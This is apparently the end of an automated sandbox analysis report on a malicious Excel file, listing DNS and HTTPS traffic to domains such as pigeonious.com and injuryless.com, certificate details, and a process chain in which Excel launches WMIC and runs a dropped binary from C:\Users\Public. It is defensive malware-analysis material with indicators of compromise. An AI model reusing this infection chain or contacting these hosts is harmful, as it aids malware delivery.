Jun 10, 2021 19:29:45.190901995 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:46.281454086 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:46.301975012 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:46.346998930 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:46.363143921 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:47.237745047 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:47.299107075 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:48.465703011 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:48.524168968 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:49.064505100 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:49.116206884 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:51.561351061 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:51.613240957 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:52.787976980 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:52.838251114 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:29:53.757215023 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:29:53.807754040 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:04.632174969 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:04.693382978 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:23.215066910 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:23.276669979 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:55.990628958 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:56.051986933 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:30:56.819478989 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:30:56.886271000 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:12.039289951 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:12.111557961 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:25.904824018 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:25.966299057 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:31:32.244328022 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:31:32.305917025 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:02.641453028 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:02.709626913 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:04.067090988 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:04.145922899 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:22.280401945 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:22.575020075 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:24.563946009 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:24.622960091 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:25.961316109 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:26.097450018 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:26.903242111 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:26.965243101 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:27.928541899 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:27.978883028 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:28.978029966 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:29.038048029 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:31.757529974 CEST | 62938 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:31.817420959 CEST | 53 | 62938 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:33.720979929 CEST | 55708 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:33.779915094 CEST | 53 | 55708 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:35.097579002 CEST | 56803 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:35.157727003 CEST | 53 | 56803 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:35.949721098 CEST | 57145 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:36.010384083 CEST | 53 | 57145 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:32:40.719794989 CEST | 55359 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:32:40.779256105 CEST | 53 | 55359 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:21.674874067 CEST | 58306 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:21.744677067 CEST | 53 | 58306 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:22.191497087 CEST | 64124 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:22.265377045 CEST | 53 | 64124 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:25.343003988 CEST | 49361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:25.412002087 CEST | 53 | 49361 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:29.503706932 CEST | 63150 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:29.564973116 CEST | 53 | 63150 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:34:29.899662018 CEST | 53279 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:34:29.963212013 CEST | 53 | 53279 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:37:29.134620905 CEST | 56881 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:37:29.206645966 CEST | 53 | 56881 | 8.8.8.8 | 192.168.2.3 |
Jun 10, 2021 19:37:32.832544088 CEST | 53642 | 53 | 192.168.2.3 | 8.8.8.8 |
Jun 10, 2021 19:37:32.912306070 CEST | 53 | 53642 | 8.8.8.8 | 192.168.2.3 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 10, 2021 19:29:51.613358021 CEST | 192.168.2.3 | 8.8.8.8 | d077 | (Port unreachable) | Destination Unreachable |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.196017981 CEST | 192.168.2.3 | 8.8.8.8 | 0x8251 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jun 10, 2021 19:29:46.281454086 CEST | 192.168.2.3 | 8.8.8.8 | 0x8f87 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.256313086 CEST | 8.8.8.8 | 192.168.2.3 | 0x8251 | No error (0) | 95.142.44.93 | A (IP address) | IN (0x0001) | ||
Jun 10, 2021 19:29:46.346998930 CEST | 8.8.8.8 | 192.168.2.3 | 0x8f87 | No error (0) | 193.178.169.243 | A (IP address) | IN (0x0001) | ||
Jun 10, 2021 19:30:56.051986933 CEST | 8.8.8.8 | 192.168.2.3 | 0x5e57 | No error (0) | www.tm.a.prd.aadg.akadns.net | CNAME (Canonical name) | IN (0x0001) | ||
Jun 10, 2021 19:34:21.744677067 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb4b | No error (0) | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 10, 2021 19:29:43.417321920 CEST | 95.142.44.93 | 443 | 192.168.2.3 | 49724 | CN=pigeonious.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Tue Jun 08 15:19:13 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Mon Sep 06 15:19:13 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | |||||||
Jun 10, 2021 19:29:46.487052917 CEST | 193.178.169.243 | 443 | 192.168.2.3 | 49727 | CN=injuryless.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu May 27 15:42:29 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Wed Aug 25 15:42:29 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 19:29:37 |
Start date: | 10/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12e0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:29:43 |
Start date: | 10/06/2021 |
Path: | C:\Windows\SysWOW64\wbem\WMIC.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x13c0000 |
File size: | 391680 bytes |
MD5 hash: | 79A01FCD1C8166C5642F37D1E0FB7BA8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:29:43 |
Start date: | 10/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2800000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:29:44 |
Start date: | 10/06/2021 |
Path: | C:\Users\Public\SettingSyncHost |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf90000 |
File size: | 511488 bytes |
MD5 hash: | 526D56017EF5105277FE0D366C95C39D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Disassembly |
---|
Code Analysis |
---|